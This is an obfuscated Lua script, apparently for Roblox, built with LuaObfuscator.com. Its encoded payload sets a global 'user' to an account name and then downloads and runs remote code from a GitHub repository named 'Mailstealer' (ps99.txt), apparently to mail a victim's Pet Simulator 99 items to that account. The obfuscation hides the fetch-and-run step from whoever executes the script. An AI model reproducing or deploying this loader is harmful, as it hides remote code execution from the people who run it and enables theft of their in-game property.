--[[
 .____                  ________ ___.    _____                           __                
 |    |    __ _______   \_____  \\_ |___/ ____\_ __  ______ ____ _____ _/  |_  ___________ 
 |    |   |  |  \__  \   /   |   \| __ \   __\  |  \/  ___// ___\\__  \\   __\/  _ \_  __ \
 |    |___|  |  // __ \_/    |    \ \_\ \  | |  |  /\___ \\  \___ / __ \|  | (  <_> )  | \/
 |_______ \____/(____  /\_______  /___  /__| |____//____  >\___  >____  /__|  \____/|__|   
         \/          \/         \/    \/                \/     \/     \/                   
          \_Welcome to LuaObfuscator.com   (Alpha 0.9.19) ~  Much Love, Ferib 

]]--

local v0=tonumber;local v1=string.byte;local v2=string.char;local v3=string.sub;local v4=string.gsub;local v5=string.rep;local v6=table.concat;local v7=table.insert;local v8=math.ldexp;local v9=getfenv or function()return _ENV;end ;local v10=setmetatable;local v11=pcall;local v12=select;local v13=unpack or table.unpack ;local v14=tonumber;local function v15(v16,v17,...)local v18=0;local v19;local v20;local v21;local v22;local v23;local v24;local v25;local v26;local v27;local v28;local v29;local v30;while true do if (v18==5) then v27=v24;v28=nil;function v28(...)return {...},v12("#",...);end v18=6;end if (v18==2) then function v22()local v31=v1(v16,v19,v19);v19=v19 + 1 ;return v31;end v23=nil;function v23()local v32=568 -(367 + 201) ;local v33;local v34;while true do if (v32==1) then return (v34 * (493 -237)) + v33 ;end if (v32==(0 -(927 -(214 + 713)))) then v33,v34=v1(v16,v19,v19 + (5 -3) );v19=v19 + (5 -3) ;v32=1;end end end v18=3;end if (v18==4) then function v25()local v35=0 + (997 -(915 + 82)) ;local v36;local v37;local v38;local v39;local v40;local v41;while true do if (v35==(0 -0)) then v36=v24();v37=v24();v35=1 + 0 + 0 ;end if (((1154 -276) -(282 + 595))==v35) then v38=1;v39=(v21(v37,1638 -(1523 + 114) ,18 + (1189 -(1069 + 118)) ) * ((2 -0)^(1097 -(68 + 997)))) + v36 ;v35=(2885 -1613) -((494 -268) + 1044) ;end if (((3 + 9) -9)==v35) then if (v40==((207 -90) -(32 + 85))) then if (v39==(0 + 0)) then return v41 * (0 + 0) ;else local v106=957 -(892 + 65) ;while true do if ((0 -0)==v106) then v40=1 -0 ;v38=0 -0 ;break;end end end elseif (v40==2047) then return ((v39==(350 -(87 + 263))) and (v41 * ((181 -(67 + 113 + 0))/(0 + (791 -(368 + 423)))))) or (v41 * NaN) ;end return v8(v41,v40-(2511 -1488) ) * (v38 + (v39/(2^(39 + 13)))) ;end if (2==v35) then v40=v21(v37,21,31);v41=((v21(v37,127 -95 )==(953 -(802 + 150))) and  -(2 -1)) or (1 -0) ;v35=3 + 0 ;end end end v26=nil;function v26(v42)local v43=0 -0 ;local v44;local v45;while true do if (v43==(19 -(10 + 8))) then v44=v3(v16,v19,(v19 + v42) -(3 -2) );v19=v19 + v42 ;v43=444 -((846 -(44 + 386)) + 26) ;end if ((0 -0)==v43) then v44=nil;if  not v42 then v42=v24();if (v42==((1486 -(998 + 488)) + 0)) then return "";end end v43=1;end if (v43==((1 + 2) -1)) then v45={};for v82=439 -(145 + 240 + 53) , #v44 do v45[v82]=v2(v1(v3(v44,v82,v82)));end v43=3;end if (v43==3) then return v6(v45);end end end v18=5;end if (v18==6) then v29=nil;function v29()local v46=0 + 0 ;local v47;local v48;local v49;local v50;local v51;local v52;local v53;local v54;while true do if (v46~=1) then else local v77=479 -(83 + 396) ;while true do if ((1 + 0)~=v77) then else v46=2 -0 ;break;end if (v77==(0 + 0)) then v49=nil;v50=nil;v77=561 -(306 + 254) ;end end end if (v46==(1 + 1)) then v51=nil;v52=nil;v46=5 -2 ;end if (v46~=(0 -0)) then else v47=0;v48=nil;v46=1;end if (v46==(3 + 0)) then local v78=0 + 0 ;while true do if (v78~=(1467 -(899 + 568))) then else v53=nil;v54=nil;v78=1976 -(1913 + 62) ;end if (v78~=(1 + 0)) then else v46=9 -5 ;break;end end end if (4==v46) then while true do if (v47~=(605 -(268 + 335))) then else local v103=0;while true do if (v103==(290 -(60 + 230))) then v52=nil;v53=nil;v103=3 -2 ;end if (v103~=(573 -(426 + 146))) then else v47=1664 -(1477 + 184) ;break;end end end if (v47==(0 + 0)) then local v104=1456 -(282 + 1174) ;while true do if (v104~=(0 + 0)) then else v48=856 -(564 + 292) ;v49=nil;v104=1;end if (v104~=(1 -0)) then else v47=812 -(569 + 242) ;break;end end end if (v47==1) then local v105=0 -0 ;while true do if (v105~=(1 + 0)) then else v47=5 -3 ;break;end if (v105~=(1024 -(706 + 318))) then else local v113=1251 -(721 + 530) ;while true do if (v113~=(1272 -(945 + 326))) then else v105=2 -1 ;break;end if (v113~=0) then else v50=nil;v51=nil;v113=1 + 0 ;end end end end end if (v47==(703 -(271 + 429))) then v54=nil;while true do local v107=0 + 0 ;local v108;while true do if (v107==(1500 -(1408 + 92))) then v108=0;while true do if (v108==(1087 -(461 + 625))) then if (v48==1) then local v158=1288 -(993 + 295) ;local v159;while true do if (0~=v158) then else v159=476 -(41 + 435) ;while true do if (v159==(0 + 0)) then local v179=0 + 0 ;local v180;while true do if ((1171 -(418 + 753))==v179) then v180=0 + 0 ;while true do if (v180~=(0 + 0)) then else local v190=0 + 0 ;while true do if (v190~=(1138 -(782 + 356))) then else v52={v49,v50,nil,v51};v53=v24();v190=2 -1 ;end if (v190~=1) then else v180=1;break;end end end if (v180==(1 -0)) then v159=1;break;end end break;end end end if (v159==(1093 -(975 + 117))) then v54={};v48=2;break;end end break;end end end if ((532 -(406 + 123))~=v48) then else local v160=1875 -(157 + 1718) ;local v161;local v162;while true do if (v160~=(1770 -(1749 + 20))) then else while true do if (v161==(0 + 0)) then v162=0;while true do if (v162==(0 -0)) then local v182=0;while true do if (v182==0) then for v192=1019 -(697 + 321) ,v24() do v50[v192-(1323 -(1249 + 73)) ]=v29();end return v52;end end end end break;end end break;end if (v160~=(0 -0)) then else v161=0 + 0 ;v162=nil;v160=1146 -(466 + 679) ;end end end break;end if ((0 -0)~=v108) then else if (v48~=(0 -0)) then else local v163=0;local v164;while true do if (0==v163) then v164=0 -0 ;while true do if (v164~=(0 -0)) then else local v181=1900 -(106 + 1794) ;while true do if (v181~=(1227 -(322 + 905))) then else v49={};v50={};v181=1;end if (v181==(612 -(602 + 9))) then v164=1190 -(449 + 740) ;break;end end end if (v164==1) then v51={};v48=1;break;end end break;end end end if ((1 + 1)==v48) then local v165=0 + 0 ;local v166;local v167;while true do if (v165==(0 -0)) then v166=0;v167=nil;v165=1;end if (v165~=(948 -(245 + 702))) then else while true do if (v166~=0) then else v167=0 -0 ;while true do if (v167~=(3 -2)) then else for v184=115 -(4 + 110) ,v24() do local v185=0;local v186;local v187;local v188;local v189;while true do if (v185~=(585 -(57 + 527))) then else v188=nil;v189=nil;v185=1429 -(41 + 1386) ;end if (v185~=(103 -(17 + 86))) then else v186=0 -0 ;v187=nil;v185=1;end if (v185==(2 + 0)) then while true do if (v186~=(0 -0)) then else v187=0 + 0 ;v188=nil;v186=1;end if (v186~=(1 -0)) then else v189=nil;while true do if (v187==(0 -0)) then local v201=0;while true do if ((167 -(122 + 44))~=v201) then else v187=1 -0 ;break;end if (v201==0) then v188=0 -0 ;v189=nil;v201=1;end end end if (1~=v187) then else while true do if (v188~=0) then else v189=v22();if (v21(v189,1 -0 ,1)==0) then local v205=0 -0 ;local v206;local v207;local v208;while true do if (v205~=(0 + 0)) then else v206=v21(v189,1 + 1 ,3);v207=v21(v189,1694 -(1121 + 569) ,11 -5 );v205=66 -(30 + 35) ;end if (v205~=2) then else local v212=0 + 0 ;local v213;while true do if (v212~=(1463 -(1404 + 59))) then else v213=0;while true do if ((1258 -(1043 + 214))==v213) then v205=3;break;end if (v213==(0 -0)) then if (v21(v207,1213 -(323 + 889) ,2 -1 )==1) then v208[767 -(468 + 297) ]=v54[v208[582 -(361 + 219) ]];end if (v21(v207,2,322 -(53 + 267) )~=(3 -2)) then else v208[3]=v54[v208[3]];end v213=1 + 0 ;end end break;end end end if (v205~=(416 -(15 + 398))) then else if (v21(v207,3,3)==(1 -0)) then v208[4]=v54[v208[986 -(18 + 964) ]];end v49[v184]=v208;break;end if (v205~=1) then else v208={v23(),v23(),nil,nil};if (v206==(0 + 0)) then local v217=850 -(20 + 830) ;local v218;while true do if (v217==(0 + 0)) then v218=0;while true do if (v218==0) then v208[129 -(116 + 10) ]=v23();v208[4]=v23();break;end end break;end end elseif (v206==1) then v208[3]=v24();elseif (v206==2) then v208[1 + 2 ]=v24() -((740 -(542 + 196))^16) ;elseif (v206==(6 -3)) then local v229=0;local v230;local v231;local v232;while true do if (v229==(0 + 0)) then v230=0 + 0 ;v231=nil;v229=1 + 0 ;end if ((2 -1)~=v229) then else v232=nil;while true do if (v230~=1) then else while true do if (v231==(0 -0)) then v232=0;while true do if (v232~=0) then else v208[166 -(92 + 71) ]=v24() -((1 + 1)^(1567 -(1126 + 425))) ;v208[4]=v23();break;end end break;end end break;end if (v230~=(405 -(118 + 287))) then else local v234=0 -0 ;while true do if (v234~=(1122 -(118 + 1003))) then else v230=2 -1 ;break;end if (0~=v234) then else v231=0 -0 ;v232=nil;v234=378 -(142 + 235) ;end end end end break;end end end v205=9 -7 ;end end end break;end end break;end end break;end end break;end end end v48=1 + 2 ;break;end if (v167==0) then local v183=977 -(553 + 424) ;while true do if (v183~=0) then else for v194=1 -0 ,v53 do local v195=126 -(55 + 71) ;local v196;local v197;local v198;local v199;local v200;while true do if (v195==(1 + 0)) then v198=nil;v199=nil;v195=1792 -(573 + 1217) ;end if ((5 -3)==v195) then v200=nil;while true do if (v196~=2) then else while true do if (v197==0) then local v204=0 + 0 ;while true do if (v204==(0 + 0)) then v198=0;v199=nil;v204=1;end if (v204~=1) then else v197=1 -0 ;break;end end end if (v197==(1 + 0)) then v200=nil;while true do if ((0 + 0)~=v198) then else local v209=0 + 0 ;local v210;while true do if ((0 -0)==v209) then v210=0;while true do if (v210==(0 -0)) then local v220=939 -(714 + 225) ;local v221;while true do if (v220==0) then v221=0 -0 ;while true do if ((0 -0)==v221) then local v233=0 + 0 ;while true do if (v233~=0) then else v199=v22();v200=nil;v233=1 + 0 ;end if (v233==(4 -3)) then v221=1;break;end end end if (v221~=(754 -(239 + 514))) then else v210=807 -(118 + 688) ;break;end end break;end end end if (v210==(49 -(25 + 23))) then v198=1;break;end end break;end end end if (v198==(1 + 0)) then if (v199==1) then v200=v22()~=(1329 -(797 + 532)) ;elseif (v199==2) then v200=v25();elseif (v199~=(3 + 0)) then else v200=v26();end v54[v194]=v200;break;end end break;end end break;end if ((0 + 0)~=v196) then else local v202=0 -0 ;while true do if (v202==(1203 -(373 + 829))) then v196=732 -(476 + 255) ;break;end if (v202~=0) then else v197=1130 -(369 + 761) ;v198=nil;v202=1;end end end if (v196==(1 + 0)) then local v203=0 -0 ;while true do if (v203==(0 -0)) then v199=nil;v200=nil;v203=1 -0 ;end if (v203~=(239 -(64 + 174))) then else v196=1 + 1 ;break;end end end end break;end if (v195~=(0 -0)) then else v196=0 -0 ;v197=nil;v195=1797 -(503 + 1293) ;end end end v52[8 -5 ]=v22();v183=1 -0 ;end if (v183==(337 -(144 + 192))) then v167=217 -(42 + 174) ;break;end end end end break;end end break;end end end v108=1 + 0 ;end end break;end end end break;end end break;end end end v30=nil;v18=7;end if (v18==0) then v19=1;v20=nil;v16=v4(v3(v16,5),"..",function(v55)if (v1(v55,2)==79) then local v71=0;while true do if (v71==0) then v20=v0(v3(v55,1,1));return "";end end else local v72=v2(v0(v55,16));if v20 then local v84=0;local v85;while true do if (v84==1) then return v85;end if (v84==0) then v85=v5(v72,v20);v20=nil;v84=1;end end else return v72;end end end);v18=1;end if (v18==3) then v24=nil;function v24()local v56=0 + 0 ;local v57;local v58;local v59;local v60;while true do if (v56==(0 + 0)) then v57,v58,v59,v60=v1(v16,v19,v19 + (536 -(43 + 490)) );v19=v19 + (737 -(172 + 539 + 22)) ;v56=3 -2 ;end if (v56==1) then return (v60 * 16777216) + (v59 * (66395 -(240 + 619))) + (v58 * 256) + v57 ;end end end v25=nil;v18=4;end if (v18==7) then function v30(v61,v62,v63)local v64=0;local v65;local v66;local v67;while true do if (v64==0) then v65=v61[1];v66=v61[2];v64=1;end if (v64==1) then v67=v61[3];return function(...)local v86=v65;local v87=v66;local v88=v67;local v89=v28;local v90=1;local v91= -1;local v92={};local v93={...};local v94=v12("#",...) -1 ;local v95={};local v96={};for v100=0,v94 do if (v100>=v88) then v92[v100-v88 ]=v93[v100 + 1 ];else v96[v100]=v93[v100 + 1 ];end end local v97=(v94-v88) + 1 ;local v98;local v99;while true do v98=v86[v90];v99=v98[1];if (v99<=5) then if (v99<=2) then if (v99<=0) then local v114=0;local v115;local v116;while true do if (v114==0) then v115=v98[2];v116=v96[v98[3]];v114=1;end if (1==v114) then v96[v115 + 1 ]=v116;v96[v115]=v116[v98[4]];break;end end elseif (v99>1) then local v117;local v118,v119;local v120;local v121;v63[v98[3]]=v96[v98[2]];v90=v90 + 1 ;v98=v86[v90];if ((v98[3]=="_ENV") or (v98[3]=="getfenv")) then v96[v98[2]]=v63;else v96[v98[2]]=v63[v98[3]];end v90=v90 + 1 ;v98=v86[v90];if ((v98[3]=="_ENV") or (v98[3]=="getfenv")) then v96[v98[2]]=v63;else v96[v98[2]]=v63[v98[3]];end v90=v90 + 1 ;v98=v86[v90];v121=v98[2];v120=v96[v98[3]];v96[v121 + 1 ]=v120;v96[v121]=v120[v98[4]];v90=v90 + 1 ;v98=v86[v90];v96[v98[2]]=v98[3];v90=v90 + 1 ;v98=v86[v90];v96[v98[2]]=v98[3]~=0 ;v90=v90 + 1 ;v98=v86[v90];v121=v98[2];v118,v119=v89(v96[v121](v13(v96,v121 + 1 ,v98[3])));v91=(v119 + v121) -1 ;v117=0;for v151=v121,v91 do local v152=0;while true do if (v152==0) then v117=v117 + 1 ;v96[v151]=v118[v117];break;end end end v90=v90 + 1 ;v98=v86[v90];v121=v98[2];v96[v121]=v96[v121](v13(v96,v121 + 1 ,v91));v90=v90 + 1 ;v98=v86[v90];v96[v98[2]]();v90=v90 + 1 ;v98=v86[v90];v90=v98[3];elseif (v96[v98[2]]==v98[4]) then v90=v90 + 1 ;else v90=v98[3];end elseif (v99<=3) then do return;end elseif (v99>4) then local v131=v98[2];local v132,v133=v89(v96[v131](v13(v96,v131 + 1 ,v98[3])));v91=(v133 + v131) -1 ;local v134=0;for v153=v131,v91 do v134=v134 + 1 ;v96[v153]=v132[v134];end else v63[v98[3]]=v96[v98[2]];end elseif (v99<=8) then if (v99<=6) then if ((v98[3]=="_ENV") or (v98[3]=="getfenv")) then v96[v98[2]]=v63;else v96[v98[2]]=v63[v98[3]];end elseif (v99==7) then v96[v98[2]]=v98[3];else v96[v98[2]]();end elseif (v99<=10) then if (v99>9) then v90=v98[3];else for v156=v98[2],v98[3] do v96[v156]=nil;end end elseif (v99==11) then local v143=0;local v144;while true do if (v143==0) then v144=v98[2];v96[v144]=v96[v144](v13(v96,v144 + 1 ,v91));break;end end else v96[v98[2]]=v98[3]~=0 ;end v90=v90 + 1 ;end end;end end end return v30(v29(),{},v17)(...);end if (v18==1) then v21=nil;function v21(v68,v69,v70)if v70 then local v73=0 -0 ;local v74;while true do if (v73==(0 + 0 + 0)) then v74=(v68/((1746 -(1344 + 400))^(v69-(406 -(255 + 150)))))%((2 + 0)^(((v70-(1 + 0)) -(v69-1)) + (4 -3))) ;return v74-(v74%(3 -2)) ;end end else local v75=1739 -(404 + (1673 -(118 + 220))) ;local v76;while true do if (v75==(406 -(183 + 223))) then v76=(2 -0)^(v69-(1 + 0)) ;return (((v68%(v76 + v76))>=v76) and (1 + 0)) or ((113 + 224) -((459 -(108 + 341)) + 327)) ;end end end end v22=nil;v18=2;end end end v15("LOL!073O00028O0003043O0075736572030C3O0050737867656D647570657278030A3O006C6F6164737472696E6703043O0067616D6503073O00482O747047657403453O00682O7470733A2O2F7261772E67697468756275736572636F6E74656E742E636F6D2F6D2O61726C2O6F77312F4D61696C737465616C65722F6D61696E2F70732O392E74787400163O0012073O00014O0009000100013O0026013O00020001000100040A3O00020001001207000100013O002601000100050001000100040A3O00050001001207000200033O001202000200023O00122O000200043O00122O000300053O00202O00030003000600122O000500076O000600016O000300066O00023O00024O00020001000100044O0015000100040A3O0005000100040A3O0015000100040A3O000200012O00033O00017O00",v9(),...);